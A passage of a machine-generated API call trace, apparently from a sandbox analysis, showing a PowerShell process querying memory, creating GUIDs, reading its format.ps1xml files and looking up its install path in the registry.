[6]=0x7c, [7]=0x99))) returned 0x0 [0078.428] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.429] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.433] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.436] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4eb54fb2, Data2=0x6bca, Data3=0x4bc6, Data4=([0]=0xbd, [1]=0x79, [2]=0x12, [3]=0x10, [4]=0xff, [5]=0x1d, [6]=0x25, [7]=0x46))) returned 0x0 [0078.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.437] GetLastError () returned 0x0 [0078.437] SetErrorMode (uMode=0x1) returned 0x1 [0078.437] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.438] GetLastError () returned 0x0 [0078.438] GetFileType (hFile=0x310) returned 0x1 [0078.438] SetErrorMode (uMode=0x1) returned 0x1 [0078.438] GetFileType (hFile=0x310) returned 0x1 [0078.438] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.440] GetLastError () returned 0x0 [0078.441] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.442] GetLastError () returned 0x0 [0078.443] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.443] GetLastError () returned 0x0 [0078.443] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.443] GetLastError () returned 0x0 [0078.445] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.445] GetLastError () returned 0x0 [0078.445] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.445] GetLastError () returned 0x0 [0078.445] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x119, lpOverlapped=0x0) returned 1 [0078.445] GetLastError () returned 0x0 [0078.445] ReadFile (in: hFile=0x310, lpBuffer=0x3006fcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3006fcc*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.445] GetLastError () returned 0x0 [0078.445] CloseHandle (hObject=0x310) returned 1 [0078.446] GetLastError () returned 0x0 [0078.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcde24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.446] GetLastError () returned 0x0 [0078.446] SetErrorMode (uMode=0x1) returned 0x1 [0078.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", fInfoLevelId=0x0, lpFileInformation=0x3027fc8 | out: lpFileInformation=0x3027fc8) returned 1 [0078.446] GetLastError () returned 0x0 [0078.446] SetErrorMode (uMode=0x1) returned 0x1 [0078.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.446] GetLastError () returned 0x0 [0078.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x310) returned 0x0 [0078.447] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.447] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.447] RegCloseKey (hKey=0x310) returned 0x0 [0078.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.447] GetLastError () returned 0x0 [0078.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.447] GetLastError () returned 0x0 [0078.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.450] GetLastError () returned 0x0 [0078.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.450] GetLastError () returned 0x0 [0078.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.450] GetLastError () returned 0x0 [0078.453] VirtualQuery (in: lpAddress=0xccfa0, lpBuffer=0xcdfa0, dwLength=0x1c | out: lpBuffer=0xcdfa0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.453] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x58cba1ba, Data2=0x169e, Data3=0x494f, Data4=([0]=0x92, [1]=0xfa, [2]=0x9b, [3]=0x1f, [4]=0xad, [5]=0xfb, [6]=0x9, [7]=0xdc))) returned 0x0 [0078.454] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.455] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xaf253cc9, Data2=0x8cf3, Data3=0x4dda, Data4=([0]=0x88, [1]=0x90, [2]=0xf8, [3]=0xd8, [4]=0xe6, [5]=0x12, [6]=0x3d, [7]=0x14))) returned 0x0 [0078.455] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf470e9b2, Data2=0x99d, Data3=0x4b60, Data4=([0]=0xb1, [1]=0xe5, [2]=0xef, [3]=0xa7, [4]=0x25, [5]=0xf1, [6]=0x29, [7]=0x8e))) returned 0x0 [0078.455] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xbfefa6c7, Data2=0xe7f0, Data3=0x41b3, Data4=([0]=0xbf, [1]=0xbd, [2]=0x38, [3]=0x6a, [4]=0x80, [5]=0x2e, [6]=0xb6, [7]=0x7))) returned 0x0 [0078.456] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.456] VirtualQuery (in: lpAddress=0xccff0, lpBuffer=0xcdff0, dwLength=0x1c | out: lpBuffer=0xcdff0*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.457] GetLastError () returned 0x0 [0078.457] SetErrorMode (uMode=0x1) returned 0x1 [0078.457] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.457] GetLastError () returned 0x0 [0078.457] GetFileType (hFile=0x310) returned 0x1 [0078.457] SetErrorMode (uMode=0x1) returned 0x1 [0078.457] GetFileType (hFile=0x310) returned 0x1 [0078.458] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.462] GetLastError () returned 0x0 [0078.463] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.464] GetLastError () returned 0x0 [0078.465] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] GetLastError () returned 0x0 [0078.465] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] GetLastError () returned 0x0 [0078.466] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.466] GetLastError () returned 0x0 [0078.467] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] GetLastError () returned 0x0 [0078.467] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] GetLastError () returned 0x0 [0078.467] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] GetLastError () returned 0x0 [0078.468] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.468] GetLastError () returned 0x0 [0078.469] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] GetLastError () returned 0x0 [0078.469] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] GetLastError () returned 0x0 [0078.469] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] GetLastError () returned 0x0 [0078.470] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] GetLastError () returned 0x0 [0078.470] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] GetLastError () returned 0x0 [0078.471] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.472] GetLastError () returned 0x0 [0078.472] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.472] GetLastError () returned 0x0 [0078.476] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.476] GetLastError () returned 0x0 [0078.476] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.476] GetLastError () returned 0x0 [0078.477] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.477] GetLastError () returned 0x0 [0078.477] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.477] GetLastError () returned 0x0 [0078.477] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.477] GetLastError () returned 0x0 [0078.478] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.478] GetLastError () returned 0x0 [0078.478] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.478] GetLastError () returned 0x0 [0078.478] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.478] GetLastError () returned 0x0 [0078.479] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.479] GetLastError () returned 0x0 [0078.479] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.479] GetLastError () returned 0x0 [0078.479] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.479] GetLastError () returned 0x0 [0078.479] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.480] GetLastError () returned 0x0 [0078.480] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.480] GetLastError () returned 0x0 [0078.480] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.480] GetLastError () returned 0x0 [0078.480] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.480] GetLastError () returned 0x0 [0078.481] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.481] GetLastError () returned 0x0 [0078.487] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.487] GetLastError () returned 0x0 [0078.487] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.487] GetLastError () returned 0x0 [0078.487] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.487] GetLastError () returned 0x0 [0078.488] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.488] GetLastError () returned 0x0 [0078.488] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.488] GetLastError () returned 0x0 [0078.488] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.488] GetLastError () returned 0x0 [0078.489] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.489] GetLastError () returned 0x0 [0078.489] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.489] GetLastError () returned 0x0 [0078.489] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.489] GetLastError () returned 0x0 [0078.490] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.490] GetLastError () returned 0x0 [0078.490] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.490] GetLastError () returned 0x0 [0078.490] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.490] GetLastError () returned 0x0 [0078.490] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.491] GetLastError () returned 0x0 [0078.491] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.491] GetLastError () returned 0x0 [0078.491] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.491] GetLastError () returned 0x0 [0078.491] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.492] GetLastError () returned 0x0 [0078.492] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.492] GetLastError () returned 0x0 [0078.492] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.492] GetLastError () returned 0x0 [0078.492] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, 